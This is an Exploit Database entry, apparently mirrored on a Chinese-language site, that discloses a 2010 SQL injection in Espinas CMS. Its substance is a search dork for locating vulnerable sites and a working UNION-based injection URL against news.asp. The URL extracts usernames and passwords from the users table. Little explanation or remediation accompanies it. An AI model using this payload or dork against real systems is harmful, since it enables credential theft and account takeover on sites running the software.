Espinas CMS – SQL Injection

• Exploit Database
• 9 阅读

• 作者： Pouya Daneshmand
  日期： 2010-04-07
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/12100/

• #################################################################
  # Securitylab.ir
  #################################################################
  # Application Info:
  # Name: Espinas CMS
  # Vendor: http://espinas.ir
  #################################################################
  # Vulnerability Info:
  # Type: Sql Injection
  # Risk: Medium
  # Dork: "Powered by Espinas IT"
  #################################################################
  Vulnerability:
  http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users
  --------------------------------------------------------------
  
  #################################################################
  # Discoverd By: Pouya Daneshmand
  # Website: http://Pouya.Securitylab.ir
  # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
  ###################################################################